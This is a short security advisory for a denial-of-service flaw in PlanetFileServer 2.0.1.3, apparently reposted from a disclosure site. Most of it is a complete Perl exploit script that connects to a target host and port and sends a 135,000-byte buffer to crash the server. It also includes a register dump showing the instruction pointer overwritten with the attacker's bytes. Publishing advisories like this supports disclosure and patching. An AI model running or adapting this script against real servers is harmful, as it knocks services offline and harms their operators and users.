PlanetFileServer DoS (Exploit)Summary
PlanetDNS provides "products and services that enable you to host your own web server, e-mail server, FTP server and more, using your own computer and your existing Internet connection".
PlanetFileServer has been found to be vulnerable to denial of service vulnerability caused by the product's improper handling of malformed requests.
Credit:
The information has been provided by unsecure.
Details
Vulnerable Systems:
* PlanetFileServer version 2.0.1.3
Exploit:
#!/usr/bin/perl
# Vulnerability: Denial Of Service - Crash
# Discovered on: June 28, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# ----------- // Registers // -----------
# Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the real problem.
# varmodAddVariable() returned error code %d
# EAX 0163D940
# ECX 41414141
# EDX 784751B6
# EBX 0163FFDC
# ESP 0163D8A8
# EBP 0163D8C8
# ESI 0163D968
# EDI 00000400
# EIP 41414141
# ------------------------------------
use IO::Socket;
use strict;
if(!$ARGV[1]) {
die "Utilisation: perl -w pfsdos.pl \n";
}
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort => $ARGV[1],Proto => "TCP"))
{
print "\n\nPlanetDNS Software - PlanetFileServer v2.0.1.3\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
print "[+] Connexion sur $ARGV[0]:$ARGV[1] ...\r\n";
print "[+] Envoi du buffer malicieux.";
# On our config the value "134891" is the min for DoS, but more is better for a great successfull exploitation.
# Security Filter Option used 7 levels, so ....
# If you change levels to the max you must set the buffer size or use this PoC 2 times, it works well.
print $socket "\x41" x 135000 . "\r\n";
close($socket);
}
else
{
print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]\n";
}
推荐
评论(0条)
